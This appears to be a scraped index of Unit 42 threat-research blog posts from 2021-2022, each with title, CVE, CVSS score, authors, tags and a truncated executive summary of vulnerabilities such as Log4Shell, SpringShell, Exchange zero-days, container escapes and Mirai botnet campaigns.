Vulnerabilities
## Threat Brief: VMware Vulnerabilities Exploited in the Wild (CVE-2022-22954 and Others)
Ruchna Nigam
Published: May 20, 2022
High Profile Threats
Vulnerabilities
CVE-2022-22954
CVE-2022-22960
CVE-2022-22972
CVE-2022-22973
VMware
## Executive Summary
On April 6, 2022, VMware published a security advisory mentioning eight vulnerabilities, including CVE-2022-22954 and CVE-2022-22960 impacting their products VMware Workspace ONE Access, Identity Manager and vRealize Automation. On April 13, they updated their advisory with information that CVE-2022-22954 is being exploited in the wild.
Multiple writeups detailing exploitation scenarios for the aforementioned two vulnerabilities were published in the last week of A
Unit42
Threat Brief: CVE-2022-1388
blogs_unit42·2022-05-10·CVSS 9.8
CVE-2022-1388 [CRITICAL] Threat Brief: CVE-2022-1388
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: CVE-2022-1388
Unit 42
Published: May 10, 2022
High Profile Threats
Vulnerabilities
BIG-IP
CVE-2022-1388
## Executive Summary
On May 4, 2022, F5 released a security advisory for a remote code execution vulnerability in the iControlREST component of its BIG-IP product tracked in CVE-2022-1388 . Threat actors can exploit this vulnerability to bypass authentication and run arbitrary code on unpatched systems. This is a critical vulnerability that needs immediate attention, as it was given a 9.8 CVSS score . Since the release of this advisory, mass scanning activity has started to occur, seeking unpatched systems, and in-the-wild exploitation has begun.
Palo Alto Networks released a Threat Prevention si
Unit42
AWS's Log4Shell Hot Patch Vulnerable to Container Escape and Privilege Escalation
blogs_unit42·2022-04-19·CVSS 8.8
CVE-2021-3100 [HIGH] AWS's Log4Shell Hot Patch Vulnerable to Container Escape and Privilege Escalation
Threat Research Center
Threat Research
Cloud Cybersecurity Research
## AWS's Log4Shell Hot Patch Vulnerable to Container Escape and Privilege Escalation
Yuval Avrahami
Published: April 19, 2022
Cloud Cybersecurity Research
Threat Research
Vulnerabilities
Apache Log4j
AWS
Container escape
Containers
CVE-2021-3100
CVE-2021-3101
CVE-2021-44228
CVE-2022-0070
CVE-2022-0071
Log4j
Privilege escalation
## Executive Summary
Following Log4Shell , AWS released several hot patch solutions that monitor for vulnerable Java applications and Java containers and patch them on the fly. Each solution suits a different environment, covering standalone servers, Kubernetes clusters, Elastic Container Service (ECS) clusters and Fargate. The hot patches aren't exclusive to AWS environment
Unit42
CVE-2022-22965: Spring Core Remote Code Execution Vulnerability Exploited In the Wild (SpringShell) (Updated)
blogs_unit42·2022-03-31·CVSS 9.8
CVE-2022-22965 [CRITICAL] CVE-2022-22965: Spring Core Remote Code Execution Vulnerability Exploited In the Wild (SpringShell) (Updated)
Threat Research Center
High Profile Threats
Vulnerabilities
## CVE-2022-22965: Spring Core Remote Code Execution Vulnerability Exploited In the Wild (SpringShell) (Updated)
Haozhe Zhang
Ken Hsu
Tao Yan
Qi Deng
Robert Falcone
Published: March 31, 2022
High Profile Threats
Vulnerabilities
CVE-2022-22963
CVE-2022-22965
Exploit in the wild
Remote Code Execution
SpringShell
## Executive Summary
Recently, two vulnerabilities were announced within the Spring Framework, an open-source framework for building enterprise Java applications. On March 29, 2022, the Spring Cloud Expression Resource Access Vulnerability tracked in CVE-2022-22963 was patched with the release of Spring Cloud Function 3.1.7 and 3.2.3. Two days later on March 31, 2022, Spring released version 5.3.18 and
Unit42
CVE-2021-28372: How a Vulnerability in Third-Party Technology Is Leaving Many IP Cameras and Surveillance Systems Vulnerable
blogs_unit42·2022-03-17·CVSS 8.3
CVE-2021-28372 [HIGH] CVE-2021-28372: How a Vulnerability in Third-Party Technology Is Leaving Many IP Cameras and Surveillance Systems Vulnerable
Threat Research Center
Threat Research
Vulnerabilities
## CVE-2021-28372: How a Vulnerability in Third-Party Technology Is Leaving Many IP Cameras and Surveillance Systems Vulnerable
Aveek Das
Sultan Omurzakov
Jun Du
Published: March 17, 2022
Threat Research
Vulnerabilities
Attack surface
CVE-2021-28372
IoT
IP camera
Supply chain
## Executive Summary
A large number of IP cameras and surveillance systems used in enterprise networks were recently discovered to be vulnerable to remote code execution and information leakage due to CVE-2021-28372, a vulnerability in the built-in ThroughTek Kalay P2P software development kit that is used by many of these devices. Many users of IP cameras and surveillance systems are unaware of the built-in software and TCP/IP stacks in their
Unit42
Container Escape to Shadow Admin: GKE Autopilot Vulnerabilities
blogs_unit42·2022-03-08
Container Escape to Shadow Admin: GKE Autopilot Vulnerabilities
Threat Research Center
Threat Research
Cloud Cybersecurity Research
## Container Escape to Shadow Admin: GKE Autopilot Vulnerabilities
Yuval Avrahami
Published: March 8, 2022
Cloud Cybersecurity Research
Threat Research
Vulnerabilities
Containers
## Executive Summary
In February 2021, Google announced Autopilot , a new mode of operation in Google Kubernetes Engine (GKE). With Autopilot, Google provides a "hands-off" Kubernetes experience, managing cluster infrastructure for the customer. The platform automatically provisions and removes nodes based on resource consumption and enforces secure Kubernetes best practices out of the box.
In June 2021, Unit 42 researchers disclosed several vulnerabilities and attack techniques in GKE Autopilot to Google. Users able to create a po
Unit42
New Linux Vulnerability CVE-2022-0492 Affecting Cgroups: Can Containers Escape?
blogs_unit42·2022-03-03·CVSS 7.8
CVE-2022-0492 [HIGH] New Linux Vulnerability CVE-2022-0492 Affecting Cgroups: Can Containers Escape?
Threat Research Center
Threat Research
Cloud Cybersecurity Research
## New Linux Vulnerability CVE-2022-0492 Affecting Cgroups: Can Containers Escape?
Yuval Avrahami
Published: March 3, 2022
Cloud Cybersecurity Research
Threat Research
Vulnerabilities
Containers
CVE-2022-0492
Linux
## Executive Summary
On Feb. 4, Linux announced CVE-2022-0492 , a new privilege escalation vulnerability in the kernel. CVE-2022-0492 marks a logical bug in control groups ( cgroups ), a Linux feature that is a fundamental building block of containers. The issue stands out as one of the simplest Linux privilege escalations discovered in recent times: The Linux kernel mistakenly exposed a privileged operation to unprivileged users.
Fortunately, the default security hardenings in most container e
Unit42
Know Your Infusion Pump Vulnerabilities and Secure Your Healthcare Organization
blogs_unit42·2022-03-02
Know Your Infusion Pump Vulnerabilities and Secure Your Healthcare Organization
Threat Research Center
Threat Research
Vulnerabilities
## Know Your Infusion Pump Vulnerabilities and Secure Your Healthcare Organization
Aveek Das
Published: March 2, 2022
Threat Research
Vulnerabilities
Healthcare
IoMT
IoT
## Executive Summary
Unit 42 recently set out to better understand how well hospitals and other healthcare providers are doing in securing smart infusion pumps, which are network-connected devices that deliver medications and fluids to patients. This topic is of critical concern because security lapses in these devices have the potential to put lives at risk or expose sensitive patient data.
We reviewed crowdsourced data from scans of more than 200,000 infusion pumps on the networks of hospitals and other healthcare organizations using IoT Security for
Unit42
SockDetour – a Silent, Fileless, Socketless Backdoor – Targets U.S. Defense Contractors
blogs_unit42·2022-02-24·CVSS 10.0
CVE-2021-28799 [CRITICAL] SockDetour – a Silent, Fileless, Socketless Backdoor – Targets U.S. Defense Contractors
Threat Research Center
Threat Research
Malware
## SockDetour – a Silent, Fileless, Socketless Backdoor – Targets U.S. Defense Contractors
Unit 42
Published: February 24, 2022
Malware
Threat Research
Vulnerabilities
Advanced Persistent Threat
Backdoor
CVE-2021-28799
CVE-2021-40539
CVE-2021-44077
TiltedTemple
Windows
## Executive Summary
Unit 42 has been tracking an APT campaign we name TiltedTemple, which we first identified in connection with its use of the Zoho ManageEngine ADSelfService Plus vulnerability CVE-2021-40539 and ServiceDesk Plus vulnerability CVE-2021-44077. The threat actors involved use a variety of techniques to gain access to and persistence in compromised systems and have successfully compromised more than a dozen organizations across the technology,
Unit42
Threat Brief: Ongoing Russia and Ukraine Cyber Activity
blogs_unit42·2022-01-20·CVSS 8.2
CVE-2021-32648 [HIGH] Threat Brief: Ongoing Russia and Ukraine Cyber Activity
Threat Research Center
High Profile Threats
Malware
## Threat Brief: Ongoing Russia and Ukraine Cyber Activity
Robert Falcone
Mike Harbison
Josh Grunzweig
Published: January 20, 2022
High Profile Threats
Malware
Vulnerabilities
CVE-2021-32648
OctoberCMS
Russia
Ukraine
WhisperGate
Windows
## Executive Summary
Beginning on Jan. 14, 2022, reports began emerging about a series of attacks targeting numerous Ukrainian government websites. As a result of these attacks, numerous government websites were found to be either defaced or inaccessible. As a result of this, the government of Ukraine formally accused Russia of masterminding these attacks against their websites.
A day later, public reporting outlined new malware called WhisperGate that originally was observed on Jan.
Unit42
Network Security Trends: August-October 2021
blogs_unit42·2021-12-21·CVSS 9.8
CVE-2021-24499 [CRITICAL] Network Security Trends: August-October 2021
Threat Research Center
Trend Reports
Vulnerabilities
## Network Security Trends: August-October 2021
Yue Guan
Published: December 21, 2021
Trend Reports
Vulnerabilities
Attack analysis
Buffer Overflow
Command injection
Cross-site request forgery
Cross-site scripting
CVE-2021-24499
CVE-2021-26084
CVE-2021-32789
CVE-2021-33357
CVE-2021-33766
CVE-2021-34473
CVE-2021-35395
CVE-2021-38647
CVE-2021-40438
CVE-2021-40870
CVE-2021-41773
CVE-2021-42013
Denial of service
Directory traversal
Exploit in the wild
Improper authentication
Information disclosure
Memory corruption
Network security trends
Out-of-bounds read
Privilege escalation
Remote Code Execution
Security feature bypass
SQL injection
## Executive Summary
Unit 42 researchers continually observe net
Unit42
Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021-44228) (Updated)
blogs_unit42·2021-12-10·CVSS 9.8
CVE-2021-44228 [CRITICAL] Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021-44228) (Updated)
Threat Research Center
Threat Research
Vulnerabilities
## Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021-44228) (Updated)
Tao Yan
Qi Deng
Haozhe Zhang
Yu Fu
Josh Grunzweig
Mike Harbison
Robert Falcone
Published: December 10, 2021
Threat Research
Vulnerabilities
Apache Log4j
CVE-2017-5645
CVE-2019-17571
CVE-2021-44228
CVE-2021-44832
CVE-2021-45046
CVE-2021-45105
Denial of service
Exploit
Log4j
Log4j 2
RCE
## Executive Summary
On Dec. 9, 2021, a remote code execution (RCE) vulnerability in Apache Log4j 2 was identified being exploited in the wild. Public proof of concept (PoC) code was released and subsequent investigation revealed that exploitation was incredibly easy to perform. By submitting a specially crafted request to a vu
Unit42
Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers Godzilla Webshells, NGLite Trojan and KdcSponge Stealer
blogs_unit42·2021-11-08
Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers Godzilla Webshells, NGLite Trojan and KdcSponge Stealer
Threat Research Center
Threat Research
Nation-State Cyberattacks
## Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers Godzilla Webshells, NGLite Trojan and KdcSponge Stealer
Robert Falcone
Jeff White
Peter Renals
Published: November 7, 2021
Nation-State Cyberattacks
Threat Research
Vulnerabilities
Advanced Persistent Threat
Backdoor
Credential Harvesting
Credential stealer
KdcSponge
ManageEngine
NGLite
TiltedTemple
Trojan
Zoho ManageEngine
## Executive Summary
On Sept. 16, 2021, the US Cybersecurity and Infrastructure Security Agency (CISA) released an alert warning that advanced persistent threat (APT) actors were actively exploiting newly identified vulnerabilities in a self-service password management and single sign-on solution known as
Unit42
Network Security Trends: May-July 2021
blogs_unit42·2021-09-17
Network Security Trends: May-July 2021
Threat Research Center
Trend Reports
Vulnerabilities
## Network Security Trends: May-July 2021
Yue Guan
Lei Xu
Published: September 17, 2021
Malware
Trend Reports
Vulnerabilities
Attack analysis
Exploit
Exploit in the wild
Network security trends
## Executive Summary
Unit 42 researchers continue to observe network security trends, tracking how cybercriminals take advantage of vulnerabilities in the real world. The following sections present our analysis of the most recently published vulnerabilities, including their severity and category distribution. Additionally, we provide insight into how the vulnerabilities are exploited in the wild based on real-world data collected from Palo Alto Networks Next-Generation Firewalls . We highlight vulnerabilities ranked medium sever
Unit42
Threat Brief: OMI Vulnerabilities (CVE-2021-38645, CVE-2021-38647, CVE-2021-38648 and CVE-2021-38649)
blogs_unit42·2021-09-16·CVSS 7.8
CVE-2021-38645 [HIGH] Threat Brief: OMI Vulnerabilities (CVE-2021-38645, CVE-2021-38647, CVE-2021-38648 and CVE-2021-38649)
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: OMI Vulnerabilities (CVE-2021-38645, CVE-2021-38647, CVE-2021-38648 and CVE-2021-38649)
Nathaniel Quist
Published: September 16, 2021
Cloud Cybersecurity Research
High Profile Threats
Vulnerabilities
Azure
CVE-2021-38645
CVE-2021-38647
CVE-2021-38648
CVE-2021-38649
OMI
OMIGOD
## Executive Summary
On Sept. 14, 2021, Microsoft’s Security Response Center (MSRC) released security patches detailing the findings of four critical vulnerabilities affecting the Microsoft Azure package Open Management Infrastructure (OMI) . The open-source OMI package is designed to provide a portable infrastructure backbone for web-based management tools, such as diagnostic monitoring, log analytic services and automat
Unit42
Finding Azurescape – Cross-Account Container Takeover in Azure Container Instances
blogs_unit42·2021-09-09·CVSS 2.6
CVE-2018-1002102 [LOW] Finding Azurescape – Cross-Account Container Takeover in Azure Container Instances
Threat Research Center
Threat Research
Cloud Cybersecurity Research
## Finding Azurescape – Cross-Account Container Takeover in Azure Container Instances
Yuval Avrahami
Published: September 9, 2021
Cloud Cybersecurity Research
Threat Research
Vulnerabilities
Azure
Azurescape
Cloud Security
Containers
CVE-2018-1002102
CVE-2019-5736
Kubernetes
RunC
## Executive Summary
Azure Container Instances (ACI) is Azure's Container-as-a-Service (CaaS) offering, enabling customers to run containers on Azure without managing the underlying servers. Unit 42 researchers recently identified and disclosed critical security issues in ACI to Microsoft. A malicious Azure user could have exploited these issues to execute code on other users' containers, steal customer secrets and images dep
Unit42
Threat Brief: CVE-2021-26084
blogs_unit42·2021-09-03·CVSS 9.8
CVE-2021-26084 [CRITICAL] Threat Brief: CVE-2021-26084
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: CVE-2021-26084
Unit 42
Published: September 3, 2021
High Profile Threats
Vulnerabilities
CVE-2021-26084
## Executive Summary
On Aug. 25, 2021, Atlassian released a security advisory for an injection vulnerability in Confluence Server and Data Center, CVE-2021-26084. If the vulnerability is exploited, threat actors could bypass authentication and run arbitrary code on unpatched systems. Since the release of this advisory, mass scanning activity has started to occur, seeking unpatched systems, and in-the-wild exploitation has begun. Unit 42 recommends customers upgrade to the latest release of Confluence Server and Data Center.
## Vulnerable Systems
The Atlassian products vulnerable to CVE-2021-260
Unit42
New Mirai Variant Targets WebSVN Command Injection Vulnerability (CVE-2021-32305)
blogs_unit42·2021-08-30·CVSS 9.8
CVE-2021-32305 [CRITICAL] New Mirai Variant Targets WebSVN Command Injection Vulnerability (CVE-2021-32305)
Threat Research Center
Threat Research
Vulnerabilities
## New Mirai Variant Targets WebSVN Command Injection Vulnerability (CVE-2021-32305)
Brock Mammen
Haozhe Zhang
Published: August 30, 2021
Threat Research
Vulnerabilities
Botnet
CVE-2021-32305
DDoS
WebSVN
## Executive Summary
We have observed exploits in the wild for a recently disclosed command injection vulnerability affecting WebSVN, an open-source web application for browsing source code. The critical command injection vulnerability was discovered and patched in May 2021. A proof of concept was released and within a week, on June 26, 2021, attackers exploited the vulnerability to deploy variants of the Mirai DDoS malware. We strongly recommend that WebSVN users upgrade to the latest software version.
Palo Alto Net
Unit42
New eCh0raix Ransomware Variant Targets QNAP and Synology Network-Attached Storage Devices
blogs_unit42·2021-08-10·CVSS 10.0
CVE-2021-28799 [CRITICAL] New eCh0raix Ransomware Variant Targets QNAP and Synology Network-Attached Storage Devices
Threat Research Center
Threat Research
Ransomware
## New eCh0raix Ransomware Variant Targets QNAP and Synology Network-Attached Storage Devices
Ruchna Nigam
Haozhe Zhang
Zhibin Zhang
Published: August 10, 2021
Ransomware
Threat Research
Vulnerabilities
CVE-2021-28799
ECh0raix
IoT
NAS
QNAPCrypt
SOHO
## Executive Summary
Unit 42 researchers have discovered a new variant of eCh0raix ransomware targeting Synology network-attached storage (NAS) and Quality Network Appliance Provider (QNAP) NAS devices. To achieve this, attackers are also leveraging CVE-2021-28799 to deliver the new eCh0raix ransomware variant to QNAP devices. While eCh0raix is known ransomware that has historically targeted QNAP and Synology NAS devices in separate campaigns, this new variant is the first
Unit42
Palo Alto Networks Discloses New Attack Surface Targeting Microsoft IIS and SQL Server at Black Hat Asia 2021
blogs_unit42·2021-07-30
Palo Alto Networks Discloses New Attack Surface Targeting Microsoft IIS and SQL Server at Black Hat Asia 2021
Threat Research Center
Threat Research
Vulnerabilities
## Palo Alto Networks Discloses New Attack Surface Targeting Microsoft IIS and SQL Server at Black Hat Asia 2021
Tao Yan
Qi Deng
Bo Qu
Zhibin Zhang
Published: July 30, 2021
Threat Research
Vulnerabilities
Attack surface
Black Hat
Exploit
IIS
JET
SQL
## Executive Summary
Unit 42 recently shared information about a new attack surface targeting Microsoft Internet Information Services (IIS) and SQL Server at Black Hat Asia 2021. In our presentation , we introduced a previously undisclosed technique to execute SQL queries on the remote database in IIS and SQL Server under SQL injection or ad hoc scenarios. We also discussed three typical cases picked from around 100 Jet vulnerabilities that we discovered in a three-mon
Unit42
Threat Brief: Windows Print Spooler RCE Vulnerability (CVE-2021-34527 AKA PrintNightmare)
blogs_unit42·2021-07-14·CVSS 7.8
CVE-2021-34527 [HIGH] Threat Brief: Windows Print Spooler RCE Vulnerability (CVE-2021-34527 AKA PrintNightmare)
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: Windows Print Spooler RCE Vulnerability (CVE-2021-34527 AKA PrintNightmare)
Unit 42
Published: July 14, 2021
High Profile Threats
Vulnerabilities
CVE-2021-1675
CVE-2021-34527
PrintNightmare
Remote Code Execution
Windows
## Executive Summary
On July 1, 2021, Microsoft released a security advisory for a new remote code execution (RCE) vulnerability in Windows, CVE-2021-34527, referred to publicly as "PrintNightmare.” Security researchers initially believed this vulnerability to be tied to CVE-2021-1675 (Windows Print Spooler Remote Code Execution Vulnerability), which was first disclosed in the Microsoft Patch Tuesday release on June 8, 2021. Microsoft has since updated the FAQ section of the advis
Unit42
Network Attack Trends: February-April 2021
blogs_unit42·2021-07-01
Network Attack Trends: February-April 2021
Threat Research Center
Trend Reports
Vulnerabilities
## Network Attack Trends: February-April 2021
Yue Guan
Lei Xu
Vaibhav Singhal
Brock Mammen
Published: July 1, 2021
Trend Reports
Vulnerabilities
Network security trends
## Executive Summary
Unit 42 researchers observed network attack trends, February-April 2021. In the following sections, we present our analysis of the most recently published vulnerabilities, including the severity and category. Additionally, we provide insight into how the vulnerabilities are actively exploited in the wild based on real-world data collected from Palo Alto Networks Next-Generation Firewalls . We then draw conclusions about the most commonly exploited vulnerabilities the attackers are using, as well as the severity, category and origin of
Unit42
What Can You Learn From a “Wiped” Computer With Digital Forensics?
blogs_unit42·2021-05-27
What Can You Learn From a “Wiped” Computer With Digital Forensics?
Threat Research Center
Threat Research
Vulnerabilities
## What Can You Learn From a “Wiped” Computer With Digital Forensics?
Michael Savitz
Published: May 27, 2021
Threat Research
Vulnerabilities
Exposed data
Insider threats
Wiped
## Executive Summary
It’s easy to assume deleting data from a computer is comparable to burning paper documents – what’s gone is gone. But is it?
There are many scenarios in which individuals would like data to be truly gone, potentially to hide a trail of criminal behavior. Yet others hope it’s recoverable, perhaps to piece together a trail of evidence.
Consider the following scenario:
An employee resigns and joins a competitor working on a similar product. The company suspects the employee shared proprietary information with her new company b
Unit42
Actor Exploits Microsoft Exchange Server Vulnerabilities, Cortex XDR Blocks Harvesting of Credentials
blogs_unit42·2021-04-15·CVSS 9.1
CVE-2021-26855 [CRITICAL] Actor Exploits Microsoft Exchange Server Vulnerabilities, Cortex XDR Blocks Harvesting of Credentials
Threat Research Center
Threat Research
Vulnerabilities
## Actor Exploits Microsoft Exchange Server Vulnerabilities, Cortex XDR Blocks Harvesting of Credentials
Robert Falcone
Published: April 15, 2021
Threat Research
Vulnerabilities
Credential Harvesting
CVE-2021-26855
CVE-2021-26857
CVE-2021-26858
CVE-2021-27065
Microsoft Exchange Server
Webshell
## Executive Summary
The recently discovered and patched Microsoft Exchange vulnerabilities ( CVE-2021-26855 , CVE-2021-26857 , CVE-2021-26858 and CVE-2021-27065 ) have garnered considerable attention due to their mass exploitation and the severity of impact each exploitation has on the affected organization. On March 6, 2021, an unknown actor exploited vulnerabilities in Microsoft Exchange Server to install a webshell on a se
Unit42
Are Your Nagios XI Servers Turning Into Cryptocurrency Miners for Attackers?
blogs_unit42·2021-04-15·CVSS 8.8
CVE-2021-25296 [HIGH] Are Your Nagios XI Servers Turning Into Cryptocurrency Miners for Attackers?
Threat Research Center
Threat Research
Vulnerabilities
## Are Your Nagios XI Servers Turning Into Cryptocurrency Miners for Attackers?
Haozhe Zhang
Vaibhav Singhal
Zhibin Zhang
Qi Deng
Published: April 15, 2021
Threat Research
Vulnerabilities
Command injection
Cryptocurrency mining
Cryptojacking
CVE-2021-25296
Nagios
XMRig
## Executive Summary
On March 16, 2021, Unit 42 researchers observed an attacker targeting Nagios XI software to exploit the vulnerability CVE-2021-25296 , a remote command injection vulnerability impacting Nagios XI version 5.7.5, to conduct a cryptojacking attack and deploy the XMRig coinminer on victims’ devices. At the time of writing, the attack is still ongoing.
Nagios XI is a widely-used software that provides enterprise server and network m
Unit42
New Vulnerability Affecting Container Engines CRI-O and Podman (CVE-2021-20291)
blogs_unit42·2021-04-14·CVSS 6.5
CVE-2021-20291 [MEDIUM] New Vulnerability Affecting Container Engines CRI-O and Podman (CVE-2021-20291)
Threat Research Center
Threat Research
Vulnerabilities
## New Vulnerability Affecting Container Engines CRI-O and Podman (CVE-2021-20291)
Aviv Sasson
Published: April 14, 2021
Threat Research
Vulnerabilities
Containers
CRI-O
CVE-2021-20291
Kubernetes
Podman LXC Container Security
## Executive Summary
As part of our initiative to improve security in the cloud-native landscape, I conducted a security audit of multiple Go libraries that Kubernetes is based on. In my research, I found CVE-2021-20291 in containers/storage that leads to a Denial of Service (DoS) of the container engines CRI-O and Podman when pulling a malicious image from a registry. Through this vulnerability, malicious actors could jeopardize any containerized infrastructure that relies on these vulnerable co
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5
[HIGH] Network Attack Trends: Internet of Threats (November 2020-January 2021)
Threat Research Center
Trend Reports
Vulnerabilities
## Network Attack Trends: Internet of Threats (November 2020-January 2021)
Lei Xu
Yue Guan
Vaibhav Singhal
Published: April 12, 2021
Malware
Trend Reports
Vulnerabilities
Botnet
DDoS
Exploit kit
IoT
Network security trends
## Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020 . Several newly observed exploits, including CVE-2020-28188 , CVE-2020-17519 , and CVE-2020-29227 , have emerged and were continuously being exploited in the wild as of late 2020 to earl
Unit42
Unit 42 Discovers 15 New Vulnerabilities Across Microsoft, Adobe and Apple Products
blogs_unit42·2021-03-19·CVSS 7.1
[HIGH] Unit 42 Discovers 15 New Vulnerabilities Across Microsoft, Adobe and Apple Products
Threat Research Center
Threat Research
Vulnerabilities
## Unit 42 Discovers 15 New Vulnerabilities Across Microsoft, Adobe and Apple Products
Bo Qu
Published: March 19, 2021
Threat Research
Vulnerabilities
Adobe
Apple
Black Hat
Microsoft
Microsoft Security Response Center (MSRC)
MSRC
Privilege escalation
Remote Code Execution
## Executive Summary
Unit 42 researchers have been credited with discovering 15 new vulnerabilities addressed by the Microsoft Security Response Center (MSRC) , Adobe Security Bulletin and Apple Security Updates , as part of the last quarter of security update releases.
## Vulnerabilities
Of the 15 new vulnerabilities credited to Unit 42 researchers, 10 come from Microsoft with severity ratings from low to important. The four Adobe Reader DC v
Unit42
Satori: Mirai Botnet Variant Targeting Vantage Velocity Field Unit RCE Vulnerability
blogs_unit42·2021-03-17·CVSS 9.8
CVE-2020-9020 [CRITICAL] Satori: Mirai Botnet Variant Targeting Vantage Velocity Field Unit RCE Vulnerability
Threat Research Center
Threat Research
Vulnerabilities
## Satori: Mirai Botnet Variant Targeting Vantage Velocity Field Unit RCE Vulnerability
Haozhe Zhang
Vaibhav Singhal
Zhibin Zhang
Jun Du
Published: March 17, 2021
Threat Research
Vulnerabilities
Botnet
CVE-2020-9020
IoT
Mirai variant
## Executive Summary
On Feb. 20, 2021, Unit 42 researchers observed attempts to exploit CVE-2020-9020 , which is a Remote Command Execution (RCE) vulnerability in Iteris’ Vantage Velocity field unit version 2.3.1, 2.4.2 and 3.0. As a travel data measurement system, Vantage Velocity captures travel data with a large number of vehicles. If a device is compromised, it will be under control of attackers, who can then leak sensitive data or conduct further attacks, such as Distributed Denial
Unit42
New Mirai Variant Targeting Network Security Devices
blogs_unit42·2021-03-16·CVSS 7.5
CVE-2019-19356 [HIGH] New Mirai Variant Targeting Network Security Devices
Threat Research Center
Threat Research
Vulnerabilities
## New Mirai Variant Targeting Network Security Devices
Vaibhav Singhal
Ruchna Nigam
Zhibin Zhang
Asher Davila
Published: March 15, 2021
Threat Research
Vulnerabilities
CVE-2019-19356
CVE-2020-25506
CVE-2020-26919
CVE-2021-22502
CVE-2021-27561
CVE-2021-27562
IoT
Mirai
VisualDoor
## Executive Summary
On Feb. 16, 2021, Unit 42 researchers discovered attacks leveraging a number of vulnerabilities, including:
VisualDoor (a SonicWall SSL-VPN exploit).
CVE-2020-25506 (a D-Link DNS-320 firewall exploit).
CVE-2020-26919 (a Netgear ProSAFE Plus exploit).
Possibly CVE-2019-19356 (a Netis WF2419 wireless router exploit).
Three other IoT vulnerabilities yet to be identified.
On Feb. 23, 2021, one of the IPs involved
Unit42
Microsoft Exchange Server Attack Timeline
blogs_unit42·2021-03-11·CVSS 9.1
CVE-2021-26855 [CRITICAL] Microsoft Exchange Server Attack Timeline
Threat Research Center
Threat Research
Vulnerabilities
## Microsoft Exchange Server Attack Timeline
Unit 42
Published: March 11, 2021
Malware
Threat Research
Vulnerabilities
CVE-2021-26855
CVE-2021-26857
CVE-2021-27065
Hafnium
Microsoft Exchange Server
## Executive Summary
On March 2, the world was introduced to four critical zero-day vulnerabilities impacting multiple versions of Microsoft Exchange Server ( CVE-2021-26855 , CVE-2021-26857 , CVE-2021-26858 and CVE-2021-27065 ). Alongside revealing these vulnerabilities, Microsoft published security updates and technical guidance that stressed the importance of patching immediately, while concurrently noting active and ongoing exploitation by an Advanced Persistent Threat (APT) they call HAFNIUM . Since the initial attack
Unit42
Remediation Steps for the Microsoft Exchange Server Vulnerabilities
blogs_unit42·2021-03-09·CVSS 9.1
CVE-2021-26855 [CRITICAL] Remediation Steps for the Microsoft Exchange Server Vulnerabilities
Threat Research Center
Threat Research
Vulnerabilities
## Remediation Steps for the Microsoft Exchange Server Vulnerabilities
Unit 42
Published: March 9, 2021
Threat Research
Vulnerabilities
CVE-2021-26855
CVE-2021-26857
CVE-2021-26858
CVE-2021-27065
Microsoft Exchange Server
## Background
On March 2, the security community became aware of four critical zero-day Microsoft Exchange Server vulnerabilities ( CVE-2021-26855 , CVE-2021-26857 , CVE-2021-26858 and CVE-2021-27065 ).
These vulnerabilities let adversaries access Exchange Servers and potentially gain long-term access to victims’ environments. While the Microsoft Threat Intelligence Center (MSTIC) attributes the initial campaign with high confidence to HAFNIUM , a group they assess to be state-sponsored and operatin
Unit42
Overview of dnsmasq Vulnerabilities: The Dangers of DNS Cache Poisoning
blogs_unit42·2021-03-08
Overview of dnsmasq Vulnerabilities: The Dangers of DNS Cache Poisoning
Threat Research Center
Threat Research
DNS
## Overview of dnsmasq Vulnerabilities: The Dangers of DNS Cache Poisoning
Daniel Prizmant
Published: March 8, 2021
DNS
Threat Research
Vulnerabilities
CoreDNS
Dnsmasq
History
Kube-dns
## Executive Summary
DNS masquerade (dnsmasq) is a widely used open source DNS resolver. While one might not be familiar with dnsmasq by name, it is used by many projects and hardware firmwares around the world , from Kubernetes to routers and other products.
Over the years, multiple critical vulnerabilities have been found in dnsmasq. Recently, security researchers discovered new issues that continue to make dnsmasq vulnerable. These vulnerabilities can lead to DNS cache poisoning, denial of service (DoS) and possibly remote code execution (RCE).
Unit42
Analyzing Attacks Against Microsoft Exchange Server With China Chopper Webshells
blogs_unit42·2021-03-08·CVSS 7.8
CVE-2021-27065 [HIGH] Analyzing Attacks Against Microsoft Exchange Server With China Chopper Webshells
Threat Research Center
Threat Research
Vulnerabilities
## Analyzing Attacks Against Microsoft Exchange Server With China Chopper Webshells
Jeff White
Published: March 8, 2021
Threat Research
Vulnerabilities
China Chopper
CVE-2021-27065
Hafnium
Microsoft Exchange Server
## Executive Summary
Microsoft recently released patches for a number of zero-day Microsoft Exchange Server vulnerabilities that are actively being exploited in the wild by HAFNIUM , a suspected state-sponsored group operating out of China. We provide an overview of the China Chopper webshell , a backdoor which has been observed being dropped in these attacks. We also analyze incidental artifacts, such as metadata, created by the attacks themselves, which allow us to collect information and better understand
Unit42
Threat Assessment: Active Exploitation of Four Zero-Day Vulnerabilities in Microsoft Exchange Server
blogs_unit42·2021-03-03·CVSS 9.1
CVE-2021-26855 [CRITICAL] Threat Assessment: Active Exploitation of Four Zero-Day Vulnerabilities in Microsoft Exchange Server
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Assessment: Active Exploitation of Four Zero-Day Vulnerabilities in Microsoft Exchange Server
Unit 42
Published: March 3, 2021
High Profile Threats
Vulnerabilities
CVE-2021-26855
CVE-2021-26857
CVE-2021-26858
CVE-2021-27065
Exploits
Microsoft Exchange Server
Zero-day
## Executive Summary
On Mar. 2, 2021, Volexity reported in-the-wild-exploitation of four Microsoft Exchange Server vulnerabilities: CVE-2021-26855 , CVE-2021-26857 , CVE-2021-26858 and CVE-2021-27065 .
As a result of these vulnerabilities being exploited, adversaries can access Microsoft Exchange Servers and allow installation of additional tools to facilitate long-term access into victims' environments. There has also been a report of m
Unit42
